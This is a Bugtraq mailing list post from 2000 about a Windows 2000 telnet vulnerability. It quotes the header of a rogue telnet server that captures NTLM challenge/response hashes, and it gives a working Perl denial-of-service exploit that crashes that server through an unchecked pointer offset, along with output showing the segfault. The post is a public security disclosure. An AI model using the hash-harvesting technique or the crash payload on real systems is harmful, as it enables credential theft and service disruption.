Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: Win2k Telnet.exe malicious server vulnerability
From: Jim Paris <jim () JTAN COM>
Date: Thu, 14 Sep 2000 12:04:09 -0400

/* NTLM telnetD v0.8

   Snarfs NTLM challenge/response by convincing w2k telnet client to
   auto-authenticate.
   Outputs auth-data in LophtCrack sniff format on stdout.

   compile: gcc -o w2kteld ntlm_telnetd.c
   run: ./w2kteld

   Then wait for w2k to telnet to you.
   for the impatient, there are always ways of making w2k telnet!

...
<snip>

And if you happen to get bitten by this rogue server,
it must be time for a friendly little DoS against it.
(rp->upos is used as a pointer modifier without checking its bounds)

sardegna:~$ ./ntlm_telnetd -l 1234 & ( sleep 1; perl killit.pl )
[1] 23535
[ Fake NTLM Telnet Daemon - by yeza ]
Listening on port 1234
Awaiting connections

Connection from: 127.0.0.1
Got NTLM response token
[1]+  Segmentation fault      ./ntlm_telnetd -l 1234
sardegna:~$

We are so batman.  And now I'm late for class.  (grr, 6.003)

-jim


#!/usr/bin/perl -w
#
# anti-ntlm-telnetd by jim () jtan
use IO::Socket;
my($s, $msg);
$s=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'localhost:1234') or die;
$s->recv($msg,1024);
$s->send("\xff\xfb\x25");
$s->recv($msg,1024);
$s->send("\xff\xfd");
$s->send("A"x7 .               # foo
         "\xFF" .              # length (passed to gettoken)
         "A"x7 .               # bar
         "NTLMSSP\0\x03" .     # protocol and type
         "A"x29 .              # baz
         "\xDE\xAD\xBE\xEF");  # rp->upos


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault